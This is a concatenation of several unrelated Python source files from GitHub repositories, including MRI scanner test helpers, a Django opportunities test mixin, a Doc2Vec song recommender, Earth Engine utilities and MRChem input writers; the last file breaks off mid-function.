    testing_dir = dirname(dirname(os.path.abspath(__file__)))  # path to `tests` dir
    pyneal_dir = dirname(testing_dir)
    test_data_dir = join(testing_dir, 'testData')

    paths = {
        'pynealDir': pyneal_dir,
        'pynealScannerDir': join(pyneal_dir, 'pyneal_scanner'),
        'testDataDir': test_data_dir,
    }
    # One environment dir plus its funcData subdir per scanner vendor.
    for vendor in ('GE', 'Philips', 'Siemens'):
        env_dir = join(test_data_dir, '{}_env'.format(vendor))
        paths['{}_dir'.format(vendor)] = env_dir
        paths['{}_funcDir'.format(vendor)] = join(env_dir, 'funcData')

    return paths
def createFakeSeriesDir(newSeriesDir):
    """ Mimic the creation of a new series directory at the start of the scan.

    Parameters
    ----------
    newSeriesDir : string
        full path for the new series directory you'd like to create

    """
    # No-op when the directory already exists (safe to call repeatedly).
    if os.path.isdir(newSeriesDir):
        return
    os.makedirs(newSeriesDir)
def copyScanData(srcDir, dstDir):
    """ copy the contents of srcDir to dstDir """
    for entry in os.listdir(srcDir):
        src = join(srcDir, entry)
        # Only plain files are copied; subdirectories are skipped.
        if os.path.isfile(src):
            shutil.copy(src, dstDir)
### Functions for updating and cleaning the test scannerConfig.yaml files
def replace_scannerConfig_sessionDir(configFile, newSessionDir):
    """ Write newSessionDir to the scannerSessionDir field of given scannerConfig file

    In order to run these tests, the `scannerConfig.yaml` file for every
    scanner enviorment in the testData directory needs to be updated to reflect
    the local path to the scannerSessionDir. Since that varies depending on where
    this test is being run from, this function will swap out that field with
    the current path base on the local path to the pynealDir

    Parameters
    ----------
    configFile : string
        path to the scannerConfig.yaml file to update
    newSessionDir : string
        local path to write into the scannerSessionDir field
    """
    # read in contents of existing yaml file
    with open(configFile, 'r') as ymlFile:
        configSettings = yaml.safe_load(ymlFile)

    # update with new setting
    configSettings['scannerSessionDir'] = newSessionDir

    # overwrite yaml file
    with open(configFile, 'w') as ymlFile:
        yaml.dump(configSettings, ymlFile, default_flow_style=False)
def cleanConfigFile(configFile):
    """ Remove local paths from scannerConfig file.

    After testing, remove the local path to the scannerSessionDir to it does
    not get pushed to gitHub

    Parameters
    ----------
    configFile : string
        path to the scannerConfig.yaml file to scrub
    """
    with open(configFile, 'r') as ymlFile:
        configSettings = yaml.safe_load(ymlFile)

    # clear existing scannerSessionDir
    configSettings['scannerSessionDir'] = ' '

    # overwrite yaml file
    with open(configFile, 'w') as ymlFile:
        yaml.dump(configSettings, ymlFile, default_flow_style=False)
### Class for creating a simple server to simulate Pyneal receiving socket
class SimRecvSocket(Thread):
    """Background thread simulating Pyneal's volume-receiving socket.

    Binds a ZMQ PAIR socket on `port`, echoes the initial handshake
    message, then receives `nVols` volumes (a JSON header followed by a
    raw voxel buffer each), acking each one, and stops itself.
    """

    def __init__(self, host, port, nVols):
        Thread.__init__(self)
        self.host = host  # NOTE(review): run() binds on '*', not this host
        self.port = port
        self.nVols = nVols          # volumes to receive before exiting
        self.alive = True
        self.receivedVols = 0

    def run(self):
        # BUG FIX: `np` was used below but numpy was never imported at
        # module level (NameError at runtime). Import locally so the
        # module itself does not require numpy unless the thread runs.
        import numpy as np

        host = '*'
        self.context = zmq.Context.instance()
        sock = self.context.socket(zmq.PAIR)
        sock.bind('tcp://{}:{}'.format(host, self.port))

        # wait for initial contact and echo it back
        while True:
            msg = sock.recv_string()
            sock.send_string(msg)
            break

        while self.alive:
            # receive header info as json
            volInfo = sock.recv_json(flags=0)

            # retrieve relevant values about this slice
            volIdx = volInfo['volIdx']
            volDtype = volInfo['dtype']
            volShape = volInfo['shape']

            # receive data stream and rebuild the volume array
            data = sock.recv(flags=0, copy=False, track=False)
            voxelArray = np.frombuffer(data, dtype=volDtype)
            voxelArray = voxelArray.reshape(volShape)

            # send response
            sock.send_string('got it')
            self.receivedVols += 1
            if self.receivedVols == self.nVols:
                self.alive = False

    def stop(self):
        # Destroying the context unblocks any pending recv calls.
        self.context.destroy()
        self.alive = False
class ServerTest(Thread):
    """Minimal ZMQ echo server on port 5555 for socket tests.

    Echoes every string it receives and shuts down after echoing 'end'.
    """

    def __init__(self):
        Thread.__init__(self)
        self.alive = True

    def run(self):
        context = zmq.Context.instance()
        self.socket = context.socket(zmq.PAIR)
        self.socket.bind('tcp://*:5555')

        while self.alive:
            msg = self.socket.recv_string()
            self.socket.send_string(msg)
            if msg == 'end':
                self.alive = False

    def stop(self):
        # NOTE(review): this only clears the flag; a thread blocked in
        # recv_string() will not wake until one more message arrives.
        self.alive = False
| jeffmacinnes/pyneal | tests/pyneal_scanner_tests/pynealScanner_helper_tools.py | pynealScanner_helper_tools.py | py | 5,196 | python | en | code | 30 | github-code | 36 |
34399989971 | from typing import List
from entity.MountAnimal import MountAnimal
class Camel(MountAnimal):
    """Mount animal with humps; adds a hump count and a spit action."""

    # Number of humps (bends) on the camel's back.
    bent_quantity: int

    def __init__(self, id: str, name: str, date_of_birth: str, commands: List[str], bent_quantity: int):
        """Create a camel with the base mount-animal fields plus its hump count."""
        super().__init__(id, name, date_of_birth, commands)
        self.bent_quantity = bent_quantity

    def to_dict(self) -> dict:
        """Serialize to a JSON-ready dict; 'type' discriminates the animal kind."""
        return {
            "type": "camel",
            "id": self.id,
            "name": self.name,
            "date_of_birth": self.date_of_birth,
            "bent_quantity": self.bent_quantity,
            "commands": self.commands
        }

    @classmethod
    def from_json(cls, json_object):
        """Alternate constructor: rebuild a Camel from a dict parsed from JSON."""
        id = json_object["id"]
        name = json_object["name"]
        date_of_birth = json_object["date_of_birth"]
        commands = json_object["commands"]
        bent_quantity = int(json_object["bent_quantity"])
        return cls(id, name, date_of_birth, commands, bent_quantity)

    def spit(self):
        """Print the camel's spitting sound."""
        print("Yackh!")
| G0ncharovAA/GB_FINAL_TEST | app/entity/Camel.py | Camel.py | py | 1,030 | python | en | code | 0 | github-code | 36 |
6798954451 | import re
import datetime
from datetime import timedelta
from django.utils import timezone
from django.conf import settings
from django.contrib.auth.models import Permission
from django.shortcuts import get_object_or_404
from exo_role.models import ExORole
from auth_uuid.jwt_helpers import _build_jwt
from auth_uuid.tests.test_mixin import RequestMockAccount
from languages.models import Language
from utils.faker_factory import faker
from ..faker_factories import (
FakeOpportunityFactory,
FakeQuestionFactory,
)
class OpportunityTestMixin:
    """Shared helpers for opportunity API tests: fake payload builders,
    permission setup, model fixture factories and HTTP endpoint mocks."""

    def get_sow_data(self):
        """Build a fake Statement-of-Work payload for the API."""
        return {
            'title': faker.text(),
            'description': faker.text(),
            'mode': settings.OPPORTUNITIES_CH_MODE_DEFAULT,
            'location': faker.city(),
            'start_date': datetime.date.today(),
            'end_date': datetime.date.today() + datetime.timedelta(days=20),
            'duration_unity': settings.OPPORTUNITIES_DURATION_UNITY_DAY,
            'duration_value': 2,
            'start_time': faker.time(),
            'timezone': faker.timezone(),
            'entity': faker.name(),
            'budgets': [
                {
                    'budget': '222',
                    'currency': settings.OPPORTUNITIES_CH_CURRENCY_DOLLAR
                }
            ],
        }

    def get_api_data(self, users=None):
        """Build a fake opportunity-creation payload.

        When `users` is given, the opportunity is targeted at exactly
        those users (target=FIXED with `users_tagged`).
        """
        # BUG FIX: `users` previously defaulted to a mutable `[]`
        # (shared-mutable-default pitfall); use None as the default.
        if users is None:
            users = []
        keywords = [
            {'name': faker.word() + faker.numerify()},
            {'name': faker.word() + faker.numerify()},
        ]
        data = {
            'title': faker.word(),
            'description': faker.text(),
            'mode': settings.OPPORTUNITIES_CH_MODE_ONSITE,
            'location': '{}, {}'.format(faker.city(), faker.country()),
            'exo_role': ExORole.objects.get(code=settings.EXO_ROLE_CODE_OTHER_OTHER).code,
            'other_category_name': faker.word(),
            'other_role_name': faker.word(),
            'certification_required': None,
            'due_date': timezone.now().date(),
            'deadline_date': (timezone.now() + timedelta(days=10)).date(),
            'duration_unity': settings.OPPORTUNITIES_DURATION_UNITY_DAY,
            'duration_value': 2,
            'num_positions': 2,
            'keywords': keywords,
            'entity': faker.company(),
            'files': [{
                'filestack_status': 'Stored',
                'url': 'https://cdn.filestackcontent.com/Lr59QG8oQRWliC6x70cx',
                'filename': 'gato.jpg',
                'mimetype': 'image/jpeg'}],
            'budgets': [
                {
                    'currency': settings.OPPORTUNITIES_CH_CURRENCY_EUR,
                    'budget': '{}.0'.format(int(faker.numerify()))
                },
                {
                    'currency': settings.OPPORTUNITIES_CH_CURRENCY_EXOS,
                    'budget': '{}.0'.format(int(faker.numerify()))
                },
            ]
        }
        if users:
            data['target'] = settings.OPPORTUNITIES_CH_TARGET_FIXED
            data['users_tagged'] = [
                {'user': user.uuid.__str__()} for user in users
            ]
        return data

    def add_marketplace_permission(self, user):
        """Grant the full-marketplace permission to `user`."""
        perm = settings.AUTH_USER_PERMS_MARKETPLACE_FULL
        permission = get_object_or_404(
            Permission,
            codename=perm)
        user.user_permissions.add(permission)

    def create_opportunity(
            self, user=None, questions=3, num_positions=3, target=None,
            duration_unity=None, role=None, group=None,
    ):
        """Create an opportunity fixture with languages and questions attached.

        Defaults to `self.super_user` as the creator when no user is given.
        """
        if not user:
            user = self.super_user
        data = {
            'user_from': user,
            'num_positions': num_positions,
        }
        # Optional overrides are only passed to the factory when set.
        if target:
            data['target'] = target
        if duration_unity:
            data['duration_unity'] = duration_unity
        if role:
            data['exo_role'] = role
        if group:
            data['group'] = group
        opportunity = FakeOpportunityFactory.create(**data)
        languages = [
            Language.objects.create(name=faker.word() + faker.numerify()) for _ in range(2)]
        opportunity.languages.add(*languages)
        FakeQuestionFactory.create_batch(size=questions, opportunity=opportunity)
        return opportunity

    def init_mock(self, m):
        """Register requests-mock URIs for the external services the API calls."""
        matcher = re.compile('{}/api/accounts/me/'.format(settings.EXOLEVER_HOST))
        m.register_uri(
            'GET',
            matcher,
            json=mock_callback)
        m.register_uri(
            'GET',
            re.compile(
                '{}/api/consultant/consultant/can-receive-opportunities/'.format(
                    settings.EXOLEVER_HOST)),
            json=[])
        m.register_uri(
            'GET',
            re.compile(
                '{}/api/accounts/groups/{}/'.format(
                    settings.EXOLEVER_HOST,
                    settings.OPPORTUNITIES_DELIVERY_MANAGER_GROUP)),
            json={'user_set': []})
        m.register_uri(
            'POST',
            re.compile(
                '{}{}api/mail/'.format(
                    settings.EXOLEVER_HOST,
                    settings.SERVICE_EXO_MAIL_HOST)),
            json={})

    def setup_credentials(self, user):
        """Attach a JWT Bearer token for `user` to the test client."""
        token = _build_jwt(user)
        self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)

    def setup_username_credentials(self):
        """Authenticate the test client with the shared service secret."""
        self.client.credentials(HTTP_USERNAME=settings.AUTH_SECRET_KEY)
# Shared registry mapping user uuid -> canned account response for the mocks.
request_mock_account = RequestMockAccount()


def mock_callback(request, context):
    """requests-mock callback: serve the canned account for the uuid in the URL.

    The uuid is the second-to-last path segment of /api/accounts/<uuid>/-style URLs.
    """
    uuid = request.path.split('/')[-2]
    return request_mock_account.get_request(uuid)
| tomasgarzon/exo-services | service-exo-opportunities/opportunities/tests/test_mixin.py | test_mixin.py | py | 5,626 | python | en | code | 0 | github-code | 36 |
6123602959 | import pandas as pd
from textslack.textslack import TextSlack
from gensim.models import doc2vec
# Architecture of the NLP Model
class NLPModel:
    """Doc2Vec-based track recommender over the SPOTIFY_DATA table.

    Trains a gensim Doc2Vec model on cleaned 'album name artist' strings
    (one tagged document per table row) and retrieves the most similar
    track for a free-text query.
    """

    # The constructor instantiates all the variables that would be used throughout the class
    def __init__(self, sp, conn, max_epochs=100, vec_size=50, alpha=0.025):
        self.sp = sp
        self.conn = conn
        self.slack = TextSlack(variety='BrE', lang='english')
        self.max_epochs = max_epochs
        self.vec_size = vec_size
        self.alpha = alpha
        # Full catalogue loaded once; its row order defines the doc2vec tags.
        self.df = pd.read_sql_table('SPOTIFY_DATA', con=self.conn)

    # Function that tags the list of words with indices
    def _create_tagged_document(self, list_of_list_of_words):
        for i, list_of_words in enumerate(list_of_list_of_words):
            yield doc2vec.TaggedDocument(list_of_words, [i])

    # Function to prepare the training data
    def _training_data(self):
        # Concatenate album/name/artist per row, clean with textslack, tokenize.
        key_features = (self.df['album'] + ' ' + self.df['name'] + ' ' + self.df['artist']).tolist()
        cleaned_key_features = self.slack.transform(key_features)
        list_list_words = [sent.split() for sent in cleaned_key_features]
        return list_list_words

    # Function to build and train the model
    def build_model(self):
        """Train a Doc2Vec model over the catalogue and save it as 'd2v.model'."""
        list_list_words = self._training_data()
        train_data = list(self._create_tagged_document(list_list_words))
        model = doc2vec.Doc2Vec(size=self.vec_size,
                                alpha=self.alpha,
                                min_alpha=0.00025,
                                min_count=1,
                                dm=1)
        model.build_vocab(train_data)
        for epoch in range(self.max_epochs):
            print('iteration {0}'.format(epoch))
            model.train(train_data,
                        total_examples=model.corpus_count,
                        epochs=model.iter)
            # decrease the learning rate
            model.alpha -= 0.0002
            # fix the learning rate, no decay
            model.min_alpha = model.alpha
        model.save('d2v.model')
        print("Model Saved")

    # Function to predict the most similar doc in the doc2vec model
    def most_similar_doc(self, target):
        """Return the catalogue row (feature columns 6..-2) most similar to `target`."""
        model = doc2vec.Doc2Vec.load('d2v.model')
        # Fixed seed so infer_vector is reproducible across calls.
        model.random.seed(95)
        cleaned_target = self.slack.transform(target).split()
        pred_vector = model.infer_vector(cleaned_target)
        sim_vector = model.docvecs.most_similar([pred_vector])
        # most_similar returns (tag, score) pairs; the tag is the row index.
        pred_index = sim_vector[0][0]
        return self.df.loc[pred_index, self.df.columns[6:-1]]
| CUTR-at-USF/muser-data-analysis | AI/models.py | models.py | py | 2,575 | python | en | code | 0 | github-code | 36 |
4153153837 | import datetime
import difflib
import os
from inspect import isabstract
from typing import Any, List, Mapping, Optional, Set, Tuple, Type
import ee # type: ignore
from requests.structures import CaseInsensitiveDict
config_path = os.path.expanduser("~/.config/taskee.ini")
def initialize_earthengine() -> None:
    """Initialize the Earth Engine API."""
    try:
        ee.Initialize()
    except ee.EEException:
        # Not yet authenticated on this machine: run the interactive
        # auth flow first, then retry initialization.
        ee.Authenticate()
        ee.Initialize()
def _get_case_insensitive_close_matches(
word: str, possibilities: List[str], n: int = 3, cutoff: float = 0.6
) -> List[str]:
"""A case-insensitive wrapper around difflib.get_close_matches.
Parameters
----------
word : str
A string for which close matches are desired.
possibilites : List[str]
A list of strings against which to match word.
n : int, default 3
The maximum number of close matches to return. n must be > 0.
cutoff : float, default 0.6
Possibilities that don't score at least that similar to word are ignored.
Returns
-------
List[str] : The best (no more than n) matches among the possibilities are returned in
a list, sorted by similarity score, most similar first.
"""
lower_matches = difflib.get_close_matches(
word.lower(), [p.lower() for p in possibilities], n, cutoff
)
return [p for p in possibilities if p.lower() in lower_matches]
def _all_subclasses(cls: Type[Any]) -> Set[Type[Any]]:
"""Recursively find all subclasses of a given class."""
return set(cls.__subclasses__()).union(
[s for c in cls.__subclasses__() for s in _all_subclasses(c)]
)
def _list_subclasses(superclass: Type[Any]) -> Mapping[str, Type[Any]]:
    """Map names of all concrete subclasses of `superclass` to their classes.

    Recursive, so sub-subclasses are included; abstract classes are
    filtered out. The returned mapping does case-insensitive key lookup.

    Parameters
    ----------
    superclass : Type[Any]
        The superclass to list subclasses of.

    Returns
    -------
    Mapping[str, Type[Any]]
        A case-insensitive dictionary mapping subclass names to classes.
    """
    mapping = {}
    for candidate in _all_subclasses(superclass):
        if isabstract(candidate):
            continue
        mapping[candidate.__name__] = candidate
    return CaseInsensitiveDict(mapping)
def _get_subclasses(names: Tuple[str, ...], superclass: Type[Any]) -> Set[Type[Any]]:
    """Retrieve a set of subclasses of a given superclass.

    Parameters
    ----------
    names : Tuple[str, ...]
        A tuple of subclass names to retrieve from the superclass.
        The special name "all" (any case) selects every subclass.
    superclass : Type[Any]
        The superclass to retrieve subclasses of.

    Returns
    -------
    Set[Type[Any]]
        A set of subclasses of the superclass.

    Raises
    ------
    AttributeError
        If a name does not match any known subclass; the message suggests
        close matches when any exist.
    """
    options = _list_subclasses(superclass)
    keys = list(options.keys())

    if "all" in [name.lower() for name in names if isinstance(name, str)]:
        return set(options.values())

    selected = []

    for name in names:
        try:
            selected.append(options[name])
        except KeyError:
            # Offer up to three fuzzy suggestions in the error message.
            close_matches = _get_case_insensitive_close_matches(name, keys, n=3)
            hint = " Close matches: {}.".format(close_matches) if close_matches else ""

            raise AttributeError(
                f'"{name}" is not a supported {superclass.__name__} type. Choose from {keys}.{hint}'
            )

    return set(selected)
def _millis_to_datetime(
millis: str, tz: Optional[datetime.timezone] = None
) -> datetime.datetime:
"""Convert a timestamp in milliseconds (e.g. from Earth Engine) to a datetime object."""
return datetime.datetime.fromtimestamp(int(millis) / 1000.0, tz=tz)
def _datetime_to_millis(dt: datetime.datetime) -> int:
"""Convert a datetime to a timestamp in milliseconds"""
return int(dt.timestamp() * 1000)
| aazuspan/taskee | taskee/utils.py | utils.py | py | 3,865 | python | en | code | 10 | github-code | 36 |
36208541438 | from django.urls import path
from proyecto.views import index_proyecto, ProyectoCreate, ProyectoList, ProyectoUpdate, ProyectoDelete, proyecto_list_total
app_name = 'proyecto'
urlpatterns = [
path("", index_proyecto, name="index_proyecto"),
path("registrar/", ProyectoCreate.as_view(), name="registrar_proyecto"),
path("listar/<int:id>", ProyectoList.as_view(), name="proyecto_listar"),
path('listaDeProyecto/', proyecto_list_total, name= 'lista_total'),
path("editar/<int:pk>", ProyectoUpdate.as_view(), name="editar_proyecto"),
path("eliminar/<int:pk>", ProyectoDelete.as_view(), name="eliminar_proyecto"),
] | joseiba/GestionSoftware | ProyectoIS2/Proyecto/proyecto/urls.py | urls.py | py | 636 | python | es | code | 0 | github-code | 36 |
28180715346 | from pathlib import Path
from .CUBEparser import parse_files
# yapf: disable
SHORTHAND_FUNCTIONALS = [
'svwn3',
'svwn5',
'pbe',
'pbe0',
'bpw91',
'bp86',
'b3p86',
'b3p86-g',
'blyp',
'b3lyp',
'b3lyp-g',
'olyp',
'kt1',
'kt2',
'kt3'
]
# yapf: enable
"""List of recognized shorthands for functionals"""
def write_scf_fock(user_dict, wf_dict, origin):
    """Assemble the Fock-operator section of the SCF program input.

    Operators are included conditionally: ZORA terms only for ZORA
    relativity, the reaction operator only for a PCM environment,
    Coulomb/exchange/XC depending on the method type, and an external
    operator only when a static electric field is requested. `origin`
    is the gauge origin passed to the external field operator.
    """
    fock_dict = {}
    # ZORA
    if user_dict["WaveFunction"]["relativity"].lower() == "zora":
        fock_dict["zora_operator"] = {
            "include_nuclear": user_dict["ZORA"]["include_nuclear"],
            "include_coulomb": user_dict["ZORA"]["include_coulomb"],
            "include_xc": user_dict["ZORA"]["include_xc"],
        }
    # Kinetic
    fock_dict["kinetic_operator"] = {"derivative": user_dict["Derivatives"]["kinetic"]}
    # Nuclear
    fock_dict["nuclear_operator"] = {
        "proj_prec": user_dict["Precisions"]["nuclear_prec"],
        "smooth_prec": user_dict["Precisions"]["nuclear_prec"],
        "nuclear_model": user_dict["WaveFunction"]["nuclear_model"],
        "shared_memory": user_dict["MPI"]["share_nuclear_potential"],
    }
    # Reaction
    if user_dict["WaveFunction"]["environment"].lower() == "pcm":
        fock_dict["reaction_operator"] = {
            "poisson_prec": user_dict["world_prec"],
            "kain": user_dict["PCM"]["SCRF"]["kain"],
            "max_iter": user_dict["PCM"]["SCRF"]["max_iter"],
            "optimizer": user_dict["PCM"]["SCRF"]["optimizer"],
            "dynamic_thrs": user_dict["PCM"]["SCRF"]["dynamic_thrs"],
            "density_type": user_dict["PCM"]["SCRF"]["density_type"],
            "epsilon_in": user_dict["PCM"]["Permittivity"]["epsilon_in"],
            "epsilon_out": user_dict["PCM"]["Permittivity"]["epsilon_out"],
            "formulation": user_dict["PCM"]["Permittivity"]["formulation"],
        }
    # Coulomb
    if wf_dict["method_type"] in ["hartree", "hf", "dft"]:
        fock_dict["coulomb_operator"] = {
            "poisson_prec": user_dict["Precisions"]["poisson_prec"],
            "shared_memory": user_dict["MPI"]["share_coulomb_potential"],
        }
    # Exchange
    if wf_dict["method_type"] in ["hf", "dft"]:
        fock_dict["exchange_operator"] = {
            "poisson_prec": user_dict["Precisions"]["poisson_prec"],
            "exchange_prec": user_dict["Precisions"]["exchange_prec"],
        }
    # Exchange-Correlation
    if wf_dict["method_type"] in ["dft"]:
        # Parse "name [coef]" lines into functional entries; a missing
        # coefficient defaults to 1.0.
        func_dict = []
        for line in wf_dict["dft_funcs"].split("\n"):
            sp = line.split()
            if len(sp) > 0:
                func = sp[0].lower()
                coef = [1.0]
                if len(sp) > 1:
                    coef = list(map(float, sp[1:]))
                func_dict.append({"name": func, "coef": coef[0]})
        fock_dict["xc_operator"] = {
            "shared_memory": user_dict["MPI"]["share_xc_potential"],
            "xc_functional": {
                "spin": user_dict["DFT"]["spin"],
                "cutoff": user_dict["DFT"]["density_cutoff"],
                "functionals": func_dict,
            },
        }
    # External electric field
    if len(user_dict["ExternalFields"]["electric_field"]) > 0:
        fock_dict["external_operator"] = {
            "electric_field": user_dict["ExternalFields"]["electric_field"],
            "r_O": origin,
        }
    return fock_dict
def write_scf_guess(user_dict, wf_dict):
    """Assemble the initial-guess section of the SCF program input.

    Decodes the zeta level from 'core_*'/'sad_*' shorthand guess names and
    falls back to the 'sad_gto' guess when a requested checkpoint or CUBE
    guess is not actually present on disk.
    """
    guess_str = user_dict["SCF"]["guess_type"].lower()
    # The part before the first underscore selects the guess family.
    guess_type = guess_str.split("_")[0]
    zeta = 0

    scf_dict = user_dict["SCF"]
    guess_prec = scf_dict["guess_prec"]

    if guess_type == "chk":
        # At least one orbital must be present in the checkpoint folder
        chk_Phi = Path(f"{scf_dict['path_checkpoint']}/phi_scf_idx_0.meta")
        if not chk_Phi.is_file():
            print(
                f"No checkpoint guess found in {scf_dict['path_checkpoint']}, falling back to 'sad_gto' initial guess"
            )
            guess_type = "sad_gto"
        else:
            # adjust guess precision if checkpoint files are present
            guess_prec = user_dict["world_prec"]

    if guess_type in ["core", "sad"]:
        # Map the '_sz'/'_dz'/'_tz'/'_qz' suffix to a numeric zeta level;
        # '_gto' keeps the full shorthand as the guess type instead.
        zeta_str = guess_str.split("_")[1]
        if zeta_str == "sz":
            zeta = 1
        elif zeta_str == "dz":
            zeta = 2
        elif zeta_str == "tz":
            zeta = 3
        elif zeta_str == "qz":
            zeta = 4
        elif zeta_str == "gto":
            guess_type = guess_str
        else:
            print("Invalid zeta:" + zeta_str)

    file_dict = user_dict["Files"]
    if guess_type == "cube":
        found = parse_files(user_dict)
        if not found:
            print(
                f"No CUBE guess found in any of the 'initial_guess' sub-folders, falling back to 'sad_gto' initial guess"
            )
            guess_type = "sad_gto"

    vector_dir = file_dict["cube_vectors"]
    guess_dict = {
        "zeta": zeta,
        "prec": guess_prec,
        "type": guess_type,
        "method": wf_dict["method_name"],
        "relativity": wf_dict["relativity_name"],
        "environment": wf_dict["environment_name"],
        "external_field": wf_dict["external_name"],
        "screen": scf_dict["guess_screen"],
        "localize": scf_dict["localize"],
        "restricted": user_dict["WaveFunction"]["restricted"],
        "file_chk": f"{scf_dict['path_checkpoint']}/phi_scf",
        "file_basis": file_dict["guess_basis"],
        "file_gto_p": file_dict["guess_gto_p"],
        "file_gto_a": file_dict["guess_gto_a"],
        "file_gto_b": file_dict["guess_gto_b"],
        "file_phi_p": file_dict["guess_phi_p"] + "_scf",
        "file_phi_a": file_dict["guess_phi_a"] + "_scf",
        "file_phi_b": file_dict["guess_phi_b"] + "_scf",
        "file_CUBE_p": f"{vector_dir}CUBE_p_vector.json",
        "file_CUBE_a": f"{vector_dir}CUBE_a_vector.json",
        "file_CUBE_b": f"{vector_dir}CUBE_b_vector.json",
    }
    return guess_dict
def write_scf_solver(user_dict, wf_dict):
    """Assemble the SCF solver input section from the validated user input.

    Negative precision values mean "not set": the final precision falls
    back to the global world precision, and the starting precision falls
    back to the final precision.
    """
    scf = user_dict["SCF"]
    final_prec = scf["final_prec"]
    if final_prec < 0.0:
        final_prec = user_dict["world_prec"]
    start_prec = scf["start_prec"]
    if start_prec < 0.0:
        start_prec = final_prec
    return {
        "method": wf_dict["method_name"],
        "relativity": wf_dict["relativity_name"],
        "environment": wf_dict["environment_name"],
        "external_field": wf_dict["external_name"],
        "kain": scf["kain"],
        "max_iter": scf["max_iter"],
        "rotation": scf["rotation"],
        "localize": scf["localize"],
        "file_chk": scf["path_checkpoint"] + "/phi_scf",
        "checkpoint": scf["write_checkpoint"],
        "start_prec": start_prec,
        "final_prec": final_prec,
        "energy_thrs": scf["energy_thrs"],
        "orbital_thrs": scf["orbital_thrs"],
        "helmholtz_prec": user_dict["Precisions"]["helmholtz_prec"],
    }
def write_scf_properties(user_dict, origin):
    """Collect the requested ground-state properties into a solver input dict.

    Only sections whose flag is enabled under user_dict["Properties"] are
    emitted; `origin` is passed through as the operator gauge origin.
    """
    props = user_dict["Properties"]
    world_prec = user_dict["world_prec"]
    prop_dict = {}
    if props["dipole_moment"]:
        prop_dict["dipole_moment"] = {
            "dip-1": {
                "operator": "h_e_dip",
                "precision": world_prec,
                "r_O": origin,
            }
        }
    if props["quadrupole_moment"]:
        prop_dict["quadrupole_moment"] = {
            "quad-1": {
                "operator": "h_e_quad",
                "precision": world_prec,
                "r_O": origin,
            }
        }
    if props["geometric_derivative"]:
        prop_dict["geometric_derivative"] = {
            "geom-1": {
                "operator": "h_nuc_grad",
                "precision": world_prec,
                "smoothing": user_dict["Precisions"]["nuclear_prec"],
            }
        }
    return prop_dict
def write_scf_plot(user_dict):
    """Build the plotting input section.

    Returns an empty dict when neither the density nor any orbital was
    requested; otherwise copies the plotter setup, converting its
    coordinates from angstrom to bohr when the world unit is angstrom.
    """
    props = user_dict["Properties"]
    if not (props["plot_density"] or len(props["plot_orbitals"])):
        return {}
    plot_dict = {
        "orbitals": props["plot_orbitals"],
        "density": props["plot_density"],
        "plotter": user_dict["Plotter"],
    }
    if user_dict["world_unit"] == "angstrom":
        ang2bohr = user_dict["Constants"]["angstrom2bohrs"]
        plot_dict["plotter"] = {
            key: [ang2bohr * r for r in values]
            for key, values in plot_dict["plotter"].items()
        }
    return plot_dict
def write_rsp_calc(omega, user_dict, origin):
    """Build the input section for one linear-response calculation at
    frequency ``omega``.

    Raises RuntimeError when a relativistic (ZORA) wavefunction is
    requested, since linear response is only implemented for the
    non-relativistic case.  Returns a dict with the unperturbed Fock
    setup plus one "components" entry per cartesian direction (x, y, z).
    """
    wf_dict = parse_wf_method(user_dict)
    if not wf_dict["relativity_name"] in ["None", "Off"]:
        raise RuntimeError(
            "Linear response not available: " + wf_dict["relativity_name"]
        )
    rsp_dict = user_dict["Response"]
    file_dict = user_dict["Files"]
    rsp_calc = {}
    rsp_calc["frequency"] = omega
    # frequencies below 1e-12 are treated as the static (omega = 0) case
    rsp_calc["dynamic"] = omega > 1.0e-12
    rsp_calc["fock_operator"] = write_rsp_fock(user_dict, wf_dict)
    rsp_calc["unperturbed"] = {
        "precision": user_dict["world_prec"],
        "localize": rsp_dict["localize"],
        "fock_operator": write_scf_fock(user_dict, wf_dict, origin),
    }
    # guess type strings look like "<type>" or "<type>_<variant>"
    guess_str = rsp_dict["guess_type"].lower()
    user_guess_type = guess_str.split("_")[0]
    user_guess_prec = rsp_dict["guess_prec"]
    vector_dir = file_dict["cube_vectors"]
    rsp_calc["components"] = []
    for dir in [0, 1, 2]:
        rsp_comp = {}
        program_guess_type = user_guess_type
        program_guess_prec = user_guess_prec
        # check that initial guess files exist
        if user_guess_type == "chk":
            chk_X = Path(f"{rsp_dict['path_checkpoint']}/X_rsp_{dir:d}")
            chk_Y = Path(f"{rsp_dict['path_checkpoint']}/Y_rsp_{dir:d}")
            if not (chk_X.is_file() and chk_Y.is_file()):
                print(
                    f"No checkpoint guess found in {rsp_dict['path_checkpoint']} for direction {dir:d}, falling back to zero initial guess"
                )
                program_guess_type = "none"
            else:
                # adjust guess precision if checkpoint files are present
                program_guess_prec = user_dict["world_prec"]
        elif user_guess_type == "cube":
            found = parse_files(user_dict, dir)
            if not found:
                print(
                    f"No CUBE guess found in any of the 'initial_guess' sub-folders for direction {dir:d}, falling back to zero initial guess"
                )
                program_guess_type = "none"
        else:
            # do no checks on other types of guess
            pass
        # file name stubs for every supported guess flavor; unused ones
        # are simply ignored by the program
        rsp_comp["initial_guess"] = {
            "prec": program_guess_prec,
            "type": program_guess_type,
            "file_chk_x": f"{rsp_dict['path_checkpoint']}/X_rsp_{dir:d}",
            "file_chk_y": f"{rsp_dict['path_checkpoint']}/Y_rsp_{dir:d}",
            "file_x_p": f"{file_dict['guess_x_p']}_rsp_{dir:d}",
            "file_x_a": f"{file_dict['guess_x_a']}_rsp_{dir:d}",
            "file_x_b": f"{file_dict['guess_x_b']}_rsp_{dir:d}",
            "file_y_p": f"{file_dict['guess_y_p']}_rsp_{dir:d}",
            "file_y_a": f"{file_dict['guess_y_a']}_rsp_{dir:d}",
            "file_y_b": f"{file_dict['guess_y_b']}_rsp_{dir:d}",
            "file_CUBE_x_p": f"{vector_dir}CUBE_x_p_{dir:d}_vector.json",
            "file_CUBE_x_a": f"{vector_dir}CUBE_x_a_{dir:d}_vector.json",
            "file_CUBE_x_b": f"{vector_dir}CUBE_x_b_{dir:d}_vector.json",
            "file_CUBE_y_p": f"{vector_dir}CUBE_y_p_{dir:d}_vector.json",
            "file_CUBE_y_a": f"{vector_dir}CUBE_y_a_{dir:d}_vector.json",
            "file_CUBE_y_b": f"{vector_dir}CUBE_y_b_{dir:d}_vector.json",
        }
        if rsp_dict["write_orbitals"]:
            path_orbitals = rsp_dict["path_orbitals"]
            rsp_comp["write_orbitals"] = {
                "file_x_p": f"{path_orbitals}/X_p_rsp_{dir:d}",
                "file_x_a": f"{path_orbitals}/X_a_rsp_{dir:d}",
                "file_x_b": f"{path_orbitals}/X_b_rsp_{dir:d}",
